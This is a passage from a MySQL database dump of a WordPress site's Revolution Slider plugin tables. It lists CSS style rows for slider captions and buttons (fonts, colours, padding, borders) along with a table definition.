1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\",\"corner_left\":\"nothing\",\"corner_right\":\"nothing\",\"parallax\":\"-\"}'),(101,'.tp-caption.NotGeneric-BigButton','{\"hover\":\"true\",\"type\":\"button\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"#000000\",\"background-transparency\":\"0\",\"border-color\":\"#ffffff\",\"border-transparency\":\"1\",\"border-style\":\"solid\",\"border-width\":\"1px\",\"border-radius\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"pointer_events\":\"auto\",\"css_cursor\":\"pointer\",\"speed\":\"300\",\"easing\":\"power1.inOut\"}','{\"idle\":{\"letter-spacing\":\"3px\"},\"hover\":\"\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"font-size\":\"14px\",\"line-height\":\"14px\",\"font-weight\":\"500\",\"font-style\":\"normal\",\"font-family\":\"Raleway\",\"padding\":[\"27px\",\"30px\",\"27px\",\"30px\"],\"text-decoration\":\"none\",\"text-align\":\"left\",\"background-color\":\"#000000\",\"background-transparency\":\"0\",\"border-color\":\"#ffffff\",\"border-transparency\":\"0.15\",\"border-style\":\"solid\",\"border-width\":\"1px\",\"border-radius\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\",\"corner_left\":\"nothing\",\"corner_right\":\"nothing\",\"parallax\":\"-\"}'),(102,'.tp-caption.WebProduct-Button','{\"hover\":\"true\",\"type\":\"button\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#333333\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"#ffffff\",\"background-transparency\":\"1\",\"border-color\":\"#000000\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"2\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"pointer_events\":\"auto\",\"css_cursor\":\"auto\",\"speed\":\"300\",\"easing\":\"none\"}','{\"idle\":{\"letter-spacing\":\"1px\"},\"hover\":\"\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"font-size\":\"16px\",\"line-height\":\"48px\",\"font-weight\":\"600\",\"font-style\":\"normal\",\"font-family\":\"Raleway\",\"padding\":[\"0px\",\"40px\",\"0px\",\"40px\"],\"text-decoration\":\"none\",\"text-align\":\"left\",\"background-color\":\"#333333\",\"background-transparency\":\"1\",\"border-color\":\"#000000\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"2\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\",\"corner_left\":\"nothing\",\"corner_right\":\"nothing\",\"parallax\":\"-\"}'),(103,'.tp-caption.Restaurant-Button','{\"hover\":\"true\",\"type\":\"button\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"#000000\",\"background-transparency\":\"0\",\"border-color\":\"#ffe081\",\"border-transparency\":\"1\",\"border-style\":\"solid\",\"border-width\":\"2\",\"border-radius\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"pointer_events\":\"auto\",\"css_cursor\":\"auto\",\"speed\":\"300\",\"easing\":\"none\"}','{\"idle\":{\"letter-spacing\":\"3px\"},\"hover\":\"\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"font-size\":\"17px\",\"line-height\":\"17px\",\"font-weight\":\"500\",\"font-style\":\"normal\",\"font-family\":\"Roboto\",\"padding\":[\"12px\",\"35px\",\"12px\",\"35px\"],\"text-decoration\":\"none\",\"text-align\":\"left\",\"background-color\":\"#0a0a0a\",\"background-transparency\":\"0\",\"border-color\":\"#ffffff\",\"border-transparency\":\"0.5\",\"border-style\":\"solid\",\"border-width\":\"2\",\"border-radius\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\",\"corner_left\":\"nothing\",\"corner_right\":\"nothing\",\"parallax\":\"-\"}'),(104,'.tp-caption.Gym-Button','{\"hover\":\"true\",\"type\":\"button\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"#72a800\",\"background-transparency\":\"1\",\"border-color\":\"#000000\",\"border-transparency\":\"0\",\"border-style\":\"solid\",\"border-width\":\"0\",\"border-radius\":[\"30px\",\"30px\",\"30px\",\"30px\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"pointer_events\":\"auto\",\"css_cursor\":\"pointer\",\"speed\":\"300\",\"easing\":\"power1.inOut\"}','{\"idle\":{\"letter-spacing\":\"1px\"},\"hover\":\"\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"font-size\":\"15px\",\"line-height\":\"15px\",\"font-weight\":\"600\",\"font-style\":\"normal\",\"font-family\":\"Raleway\",\"padding\":[\"13px\",\"35px\",\"13px\",\"35px\"],\"text-decoration\":\"none\",\"text-align\":\"left\",\"background-color\":\"#8bc027\",\"background-transparency\":\"1\",\"border-color\":\"#000000\",\"border-transparency\":\"0\",\"border-style\":\"solid\",\"border-width\":\"0\",\"border-radius\":[\"30px\",\"30px\",\"30px\",\"30px\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\",\"corner_left\":\"nothing\",\"corner_right\":\"nothing\",\"parallax\":\"-\"}'),(105,'.tp-caption.Gym-Button-Light','{\"hover\":\"true\",\"type\":\"button\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"#72a800\",\"background-transparency\":\"0\",\"border-color\":\"#8bc027\",\"border-transparency\":\"1\",\"border-style\":\"solid\",\"border-width\":\"2px\",\"border-radius\":[\"30px\",\"30px\",\"30px\",\"30px\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"pointer_events\":\"auto\",\"css_cursor\":\"pointer\",\"speed\":\"300\",\"easing\":\"power2.inOut\"}','{\"idle\":\"\",\"hover\":\"\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"font-size\":\"15px\",\"line-height\":\"15px\",\"font-weight\":\"600\",\"font-style\":\"normal\",\"font-family\":\"Raleway\",\"padding\":[\"12px\",\"35px\",\"12px\",\"35px\"],\"text-decoration\":\"none\",\"text-align\":\"left\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"#ffffff\",\"border-transparency\":\"0.25\",\"border-style\":\"solid\",\"border-width\":\"2px\",\"border-radius\":[\"30px\",\"30px\",\"30px\",\"30px\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\",\"corner_left\":\"nothing\",\"corner_right\":\"nothing\",\"parallax\":\"-\"}'),(106,'.tp-caption.Sports-Button-Light','{\"hover\":\"true\",\"type\":\"button\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"#000000\",\"background-transparency\":\"0\",\"border-color\":\"#ffffff\",\"border-transparency\":\"1\",\"border-style\":\"solid\",\"border-width\":\"2\",\"border-radius\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"pointer_events\":\"auto\",\"css_cursor\":\"auto\",\"speed\":\"500\",\"easing\":\"none\"}','{\"idle\":{\"letter-spacing\":\"2px\"},\"hover\":\"\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"font-size\":\"17px\",\"line-height\":\"17px\",\"font-weight\":\"600\",\"font-style\":\"normal\",\"font-family\":\"Raleway\",\"padding\":[\"12px\",\"35px\",\"12px\",\"35px\"],\"text-decoration\":\"none\",\"text-align\":\"left\",\"background-color\":\"#000000\",\"background-transparency\":\"0\",\"border-color\":\"#ffffff\",\"border-transparency\":\"0.5\",\"border-style\":\"solid\",\"border-width\":\"2\",\"border-radius\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\",\"corner_left\":\"nothing\",\"corner_right\":\"nothing\",\"parallax\":\"-\"}'),(107,'.tp-caption.Sports-Button-Red','{\"hover\":\"true\",\"type\":\"button\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"#000000\",\"background-transparency\":\"1\",\"border-color\":\"#000000\",\"border-transparency\":\"1\",\"border-style\":\"solid\",\"border-width\":\"2\",\"border-radius\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"pointer_events\":\"auto\",\"css_cursor\":\"auto\",\"speed\":\"500\",\"easing\":\"none\"}','{\"idle\":{\"letter-spacing\":\"2px\"},\"hover\":\"\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"font-size\":\"17px\",\"line-height\":\"17px\",\"font-weight\":\"600\",\"font-style\":\"normal\",\"font-family\":\"Raleway\",\"padding\":[\"12px\",\"35px\",\"12px\",\"35px\"],\"text-decoration\":\"none\",\"text-align\":\"left\",\"background-color\":\"#db1c22\",\"background-transparency\":\"1\",\"border-color\":\"#db1c22\",\"border-transparency\":\"0\",\"border-style\":\"solid\",\"border-width\":\"2px\",\"border-radius\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\",\"corner_left\":\"nothing\",\"corner_right\":\"nothing\",\"parallax\":\"-\"}'),(108,'.tp-caption.Photography-Button','{\"hover\":\"true\",\"type\":\"button\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"#000000\",\"background-transparency\":\"0\",\"border-color\":\"#ffffff\",\"border-transparency\":\"1\",\"border-style\":\"solid\",\"border-width\":\"1px\",\"border-radius\":[\"30px\",\"30px\",\"30px\",\"30px\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"pointer_events\":\"auto\",\"css_cursor\":\"auto\",\"speed\":\"300\",\"easing\":\"power3.out\"}','{\"idle\":{\"letter-spacing\":\"1px\"},\"hover\":\"\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"font-size\":\"15px\",\"line-height\":\"15px\",\"font-weight\":\"600\",\"font-style\":\"normal\",\"font-family\":\"Raleway\",\"padding\":[\"13px\",\"35px\",\"13px\",\"35px\"],\"text-decoration\":\"none\",\"text-align\":\"left\",\"background-color\":\"#000000\",\"background-transparency\":\"0\",\"border-color\":\"#ffffff\",\"border-transparency\":\"0.25\",\"border-style\":\"solid\",\"border-width\":\"1px\",\"border-radius\":[\"30px\",\"30px\",\"30px\",\"30px\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\",\"corner_left\":\"nothing\",\"corner_right\":\"nothing\",\"parallax\":\"-\"}'),(109,'.tp-caption.Newspaper-Button-2','{\"hover\":\"true\",\"type\":\"button\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"#000000\",\"background-transparency\":\"0\",\"border-color\":\"#ffffff\",\"border-transparency\":\"1\",\"border-style\":\"solid\",\"border-width\":\"2\",\"border-radius\":[\"3px\",\"3px\",\"3px\",\"3px\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"pointer_events\":\"auto\",\"css_cursor\":\"pointer\",\"speed\":\"300\",\"easing\":\"none\"}','{\"idle\":\"\",\"hover\":\"\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"font-size\":\"15px\",\"line-height\":\"15px\",\"font-weight\":\"900\",\"font-style\":\"normal\",\"font-family\":\"Roboto\",\"padding\":[\"10px\",\"30px\",\"10px\",\"30px\"],\"text-decoration\":\"none\",\"text-align\":\"left\",\"background-color\":\"#000000\",\"background-transparency\":\"0\",\"border-color\":\"#ffffff\",\"border-transparency\":\"0.5\",\"border-style\":\"solid\",\"border-width\":\"2\",\"border-radius\":[\"3px\",\"3px\",\"3px\",\"3px\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\",\"corner_left\":\"nothing\",\"corner_right\":\"nothing\",\"parallax\":\"-\"}');
/*!40000 ALTER TABLE `wpev_revslider_css` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpev_revslider_css_bkp`
--

DROP TABLE IF EXISTS `wpev_revslider_css_bkp`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpev_revslider_css_bkp` (
  `id` int(9) NOT NULL AUTO_INCREMENT,
  `handle` text NOT NULL,
  `settings` longtext DEFAULT NULL,
  `hover` longtext DEFAULT NULL,
  `advanced` longtext DEFAULT NULL,
  `params` longtext NOT NULL,
  PRIMARY KEY (`id`),
  KEY `handle_index` (`handle`(64))
) ENGINE=InnoDB AUTO_INCREMENT=48 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpev_revslider_css_bkp`
--

LOCK TABLES `wpev_revslider_css_bkp` WRITE;
/*!40000 ALTER TABLE `wpev_revslider_css_bkp` DISABLE KEYS */;
INSERT INTO `wpev_revslider_css_bkp` VALUES (1,'.tp-caption.medium_grey',NULL,NULL,NULL,'{\"position\":\"absolute\",\"color\":\"#fff\",\"text-shadow\":\"0px 2px 5px rgba(0, 0, 0, 0.5)\",\"font-weight\":\"700\",\"font-size\":\"20px\",\"line-height\":\"20px\",\"font-family\":\"Arial\",\"padding\":\"2px 4px\",\"margin\":\"0px\",\"border-width\":\"0px\",\"border-style\":\"none\",\"background-color\":\"#888\",\"white-space\":\"nowrap\"}'),(2,'.tp-caption.small_text',NULL,NULL,NULL,'{\"position\":\"absolute\",\"color\":\"#fff\",\"text-shadow\":\"0px 2px 5px rgba(0, 0, 0, 0.5)\",\"font-weight\":\"700\",\"font-size\":\"14px\",\"line-height\":\"20px\",\"font-family\":\"Arial\",\"margin\":\"0px\",\"border-width\":\"0px\",\"border-style\":\"none\",\"white-space\":\"nowrap\"}'),(3,'.tp-caption.medium_text',NULL,NULL,NULL,'{\"position\":\"absolute\",\"color\":\"#fff\",\"text-shadow\":\"0px 2px 5px rgba(0, 0, 0, 0.5)\",\"font-weight\":\"700\",\"font-size\":\"20px\",\"line-height\":\"20px\",\"font-family\":\"Arial\",\"margin\":\"0px\",\"border-width\":\"0px\",\"border-style\":\"none\",\"white-space\":\"nowrap\"}'),(4,'.tp-caption.large_text',NULL,NULL,NULL,'{\"position\":\"absolute\",\"color\":\"#fff\",\"text-shadow\":\"0px 2px 5px rgba(0, 0, 0, 0.5)\",\"font-weight\":\"700\",\"font-size\":\"40px\",\"line-height\":\"40px\",\"font-family\":\"Arial\",\"margin\":\"0px\",\"border-width\":\"0px\",\"border-style\":\"none\",\"white-space\":\"nowrap\"}'),(5,'.tp-caption.very_large_text',NULL,NULL,NULL,'{\"position\":\"absolute\",\"color\":\"#fff\",\"text-shadow\":\"0px 2px 5px rgba(0, 0, 0, 0.5)\",\"font-weight\":\"700\",\"font-size\":\"60px\",\"line-height\":\"60px\",\"font-family\":\"Arial\",\"margin\":\"0px\",\"border-width\":\"0px\",\"border-style\":\"none\",\"white-space\":\"nowrap\",\"letter-spacing\":\"-2px\"}'),(6,'.tp-caption.very_big_white',NULL,NULL,NULL,'{\"position\":\"absolute\",\"color\":\"#fff\",\"text-shadow\":\"none\",\"font-weight\":\"800\",\"font-size\":\"60px\",\"line-height\":\"60px\",\"font-family\":\"Arial\",\"margin\":\"0px\",\"border-width\":\"0px\",\"border-style\":\"none\",\"white-space\":\"nowrap\",\"padding\":\"0px 4px\",\"padding-top\":\"1px\",\"background-color\":\"#000\"}'),(7,'.tp-caption.very_big_black',NULL,NULL,NULL,'{\"position\":\"absolute\",\"color\":\"#000\",\"text-shadow\":\"none\",\"font-weight\":\"700\",\"font-size\":\"60px\",\"line-height\":\"60px\",\"font-family\":\"Arial\",\"margin\":\"0px\",\"border-width\":\"0px\",\"border-style\":\"none\",\"white-space\":\"nowrap\",\"padding\":\"0px 4px\",\"padding-top\":\"1px\",\"background-color\":\"#fff\"}'),(8,'.tp-caption.modern_medium_fat',NULL,NULL,NULL,'{\"position\":\"absolute\",\"color\":\"#000\",\"text-shadow\":\"none\",\"font-weight\":\"800\",\"font-size\":\"24px\",\"line-height\":\"20px\",\"font-family\":\"\\\"Open Sans\\\", sans-serif\",\"margin\":\"0px\",\"border-width\":\"0px\",\"border-style\":\"none\",\"white-space\":\"nowrap\"}'),(9,'.tp-caption.modern_medium_fat_white',NULL,NULL,NULL,'{\"position\":\"absolute\",\"color\":\"#fff\",\"text-shadow\":\"none\",\"font-weight\":\"800\",\"font-size\":\"24px\",\"line-height\":\"20px\",\"font-family\":\"\\\"Open Sans\\\", sans-serif\",\"margin\":\"0px\",\"border-width\":\"0px\",\"border-style\":\"none\",\"white-space\":\"nowrap\"}'),(10,'.tp-caption.modern_medium_light',NULL,NULL,NULL,'{\"position\":\"absolute\",\"color\":\"#000\",\"text-shadow\":\"none\",\"font-weight\":\"300\",\"font-size\":\"24px\",\"line-height\":\"20px\",\"font-family\":\"\\\"Open Sans\\\", sans-serif\",\"margin\":\"0px\",\"border-width\":\"0px\",\"border-style\":\"none\",\"white-space\":\"nowrap\"}'),(11,'.tp-caption.modern_big_bluebg',NULL,NULL,NULL,'{\"position\":\"absolute\",\"color\":\"#fff\",\"text-shadow\":\"none\",\"font-weight\":\"800\",\"font-size\":\"30px\",\"line-height\":\"36px\",\"font-family\":\"\\\"Open Sans\\\", sans-serif\",\"padding\":\"3px 10px\",\"margin\":\"0px\",\"border-width\":\"0px\",\"border-style\":\"none\",\"background-color\":\"#4e5b6c\",\"letter-spacing\":\"0\"}'),(12,'.tp-caption.modern_big_redbg',NULL,NULL,NULL,'{\"position\":\"absolute\",\"color\":\"#fff\",\"text-shadow\":\"none\",\"font-weight\":\"300\",\"font-size\":\"30px\",\"line-height\":\"36px\",\"font-family\":\"\\\"Open Sans\\\", sans-serif\",\"padding\":\"3px 10px\",\"padding-top\":\"1px\",\"margin\":\"0px\",\"border-width\":\"0px\",\"border-style\":\"none\",\"background-color\":\"#de543e\",\"letter-spacing\":\"0\"}'),(13,'.tp-caption.modern_small_text_dark',NULL,NULL,NULL,'{\"position\":\"absolute\",\"color\":\"#555\",\"text-shadow\":\"none\",\"font-size\":\"14px\",\"line-height\":\"22px\",\"font-family\":\"Arial\",\"margin\":\"0px\",\"border-width\":\"0px\",\"border-style\":\"none\",\"white-space\":\"nowrap\"}'),(14,'.tp-caption.boxshadow',NULL,NULL,NULL,'{\"-moz-box-shadow\":\"0px 0px 20px rgba(0, 0, 0, 0.5)\",\"-webkit-box-shadow\":\"0px 0px 20px rgba(0, 0, 0, 0.5)\",\"box-shadow\":\"0px 0px 20px rgba(0, 0, 0, 0.5)\"}'),(15,'.tp-caption.black',NULL,NULL,NULL,'{\"color\":\"#000\",\"text-shadow\":\"none\"}'),(16,'.tp-caption.noshadow',NULL,NULL,NULL,'{\"text-shadow\":\"none\"}'),(17,'.tp-caption.thinheadline_dark',NULL,NULL,NULL,'{\"position\":\"absolute\",\"color\":\"rgba(0,0,0,0.85)\",\"text-shadow\":\"none\",\"font-weight\":\"300\",\"font-size\":\"30px\",\"line-height\":\"30px\",\"font-family\":\"\\\"Open Sans\\\"\",\"background-color\":\"transparent\"}'),(18,'.tp-caption.thintext_dark',NULL,NULL,NULL,'{\"position\":\"absolute\",\"color\":\"rgba(0,0,0,0.85)\",\"text-shadow\":\"none\",\"font-weight\":\"300\",\"font-size\":\"16px\",\"line-height\":\"26px\",\"font-family\":\"\\\"Open Sans\\\"\",\"background-color\":\"transparent\"}'),(19,'.tp-caption.largeblackbg',NULL,NULL,NULL,'{\"position\":\"absolute\",\"color\":\"#fff\",\"text-shadow\":\"none\",\"font-weight\":\"300\",\"font-size\":\"50px\",\"line-height\":\"70px\",\"font-family\":\"\\\"Open Sans\\\"\",\"background-color\":\"#000\",\"padding\":\"0px 20px\",\"-webkit-border-radius\":\"0px\",\"-moz-border-radius\":\"0px\",\"border-radius\":\"0px\"}'),(20,'.tp-caption.largepinkbg',NULL,NULL,NULL,'{\"position\":\"absolute\",\"color\":\"#fff\",\"text-shadow\":\"none\",\"font-weight\":\"300\",\"font-size\":\"50px\",\"line-height\":\"70px\",\"font-family\":\"\\\"Open Sans\\\"\",\"background-color\":\"#db4360\",\"padding\":\"0px 20px\",\"-webkit-border-radius\":\"0px\",\"-moz-border-radius\":\"0px\",\"border-radius\":\"0px\"}'),(21,'.tp-caption.largewhitebg',NULL,NULL,NULL,'{\"position\":\"absolute\",\"color\":\"#000\",\"text-shadow\":\"none\",\"font-weight\":\"300\",\"font-size\":\"50px\",\"line-height\":\"70px\",\"font-family\":\"\\\"Open Sans\\\"\",\"background-color\":\"#fff\",\"padding\":\"0px 20px\",\"-webkit-border-radius\":\"0px\",\"-moz-border-radius\":\"0px\",\"border-radius\":\"0px\"}'),(22,'.tp-caption.largegreenbg',NULL,NULL,NULL,'{\"position\":\"absolute\",\"color\":\"#fff\",\"text-shadow\":\"none\",\"font-weight\":\"300\",\"font-size\":\"50px\",\"line-height\":\"70px\",\"font-family\":\"\\\"Open Sans\\\"\",\"background-color\":\"#67ae73\",\"padding\":\"0px 20px\",\"-webkit-border-radius\":\"0px\",\"-moz-border-radius\":\"0px\",\"border-radius\":\"0px\"}'),(23,'.tp-caption.excerpt',NULL,NULL,NULL,'{\"font-size\":\"36px\",\"line-height\":\"36px\",\"font-weight\":\"700\",\"font-family\":\"Arial\",\"color\":\"#ffffff\",\"text-decoration\":\"none\",\"background-color\":\"rgba(0, 0, 0, 1)\",\"text-shadow\":\"none\",\"margin\":\"0px\",\"letter-spacing\":\"-1.5px\",\"padding\":\"1px 4px 0px 4px\",\"width\":\"150px\",\"white-space\":\"normal !important\",\"height\":\"auto\",\"border-width\":\"0px\",\"border-color\":\"rgb(255, 255, 255)\",\"border-style\":\"none\"}'),(24,'.tp-caption.large_bold_grey',NULL,NULL,NULL,'{\"font-size\":\"60px\",\"line-height\":\"60px\",\"font-weight\":\"800\",\"font-family\":\"\\\"Open Sans\\\"\",\"color\":\"rgb(102, 102, 102)\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"text-shadow\":\"none\",\"margin\":\"0px\",\"padding\":\"1px 4px 0px\",\"border-width\":\"0px\",\"border-color\":\"rgb(255, 214, 88)\",\"border-style\":\"none\"}'),(25,'.tp-caption.medium_thin_grey',NULL,NULL,NULL,'{\"font-size\":\"34px\",\"line-height\":\"30px\",\"font-weight\":\"300\",\"font-family\":\"\\\"Open Sans\\\"\",\"color\":\"rgb(102, 102, 102)\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"padding\":\"1px 4px 0px\",\"text-shadow\":\"none\",\"margin\":\"0px\",\"border-width\":\"0px\",\"border-color\":\"rgb(255, 214, 88)\",\"border-style\":\"none\"}'),(26,'.tp-caption.small_thin_grey',NULL,NULL,NULL,'{\"font-size\":\"18px\",\"line-height\":\"26px\",\"font-weight\":\"300\",\"font-family\":\"\\\"Open Sans\\\"\",\"color\":\"rgb(117, 117, 117)\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"padding\":\"1px 4px 0px\",\"text-shadow\":\"none\",\"margin\":\"0px\",\"border-width\":\"0px\",\"border-color\":\"rgb(255, 214, 88)\",\"border-style\":\"none\"}'),(27,'.tp-caption.lightgrey_divider',NULL,NULL,NULL,'{\"text-decoration\":\"none\",\"background-color\":\"rgba(235, 235, 235, 1)\",\"width\":\"370px\",\"height\":\"3px\",\"background-position\":\"initial initial\",\"background-repeat\":\"initial initial\",\"border-width\":\"0px\",\"border-color\":\"rgb(34, 34, 34)\",\"border-style\":\"none\"}'),(28,'.tp-caption.large_bold_darkblue',NULL,NULL,NULL,'{\"font-size\":\"58px\",\"line-height\":\"60px\",\"font-weight\":\"800\",\"font-family\":\"\\\"Open Sans\\\"\",\"color\":\"rgb(52, 73, 94)\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"border-width\":\"0px\",\"border-color\":\"rgb(255, 214, 88)\",\"border-style\":\"none\"}'),(29,'.tp-caption.medium_bg_darkblue',NULL,NULL,NULL,'{\"font-size\":\"20px\",\"line-height\":\"20px\",\"font-weight\":\"800\",\"font-family\":\"\\\"Open Sans\\\"\",\"color\":\"rgb(255, 255, 255)\",\"text-decoration\":\"none\",\"background-color\":\"rgb(52, 73, 94)\",\"padding\":\"10px\",\"border-width\":\"0px\",\"border-color\":\"rgb(255, 214, 88)\",\"border-style\":\"none\"}'),(30,'.tp-caption.medium_bold_red',NULL,NULL,NULL,'{\"font-size\":\"24px\",\"line-height\":\"30px\",\"font-weight\":\"800\",\"font-family\":\"\\\"Open Sans\\\"\",\"color\":\"rgb(227, 58, 12)\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"padding\":\"0px\",\"border-width\":\"0px\",\"border-color\":\"rgb(255, 214, 88)\",\"border-style\":\"none\"}'),(31,'.tp-caption.medium_light_red',NULL,NULL,NULL,'{\"font-size\":\"21px\",\"line-height\":\"26px\",\"font-weight\":\"300\",\"font-family\":\"\\\"Open Sans\\\"\",\"color\":\"rgb(227, 58, 12)\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"padding\":\"0px\",\"border-width\":\"0px\",\"border-color\":\"rgb(255, 214, 88)\",\"border-style\":\"none\"}'),(32,'.tp-caption.medium_bg_red',NULL,NULL,NULL,'{\"font-size\":\"20px\",\"line-height\":\"20px\",\"font-weight\":\"800\",\"font-family\":\"\\\"Open Sans\\\"\",\"color\":\"rgb(255, 255, 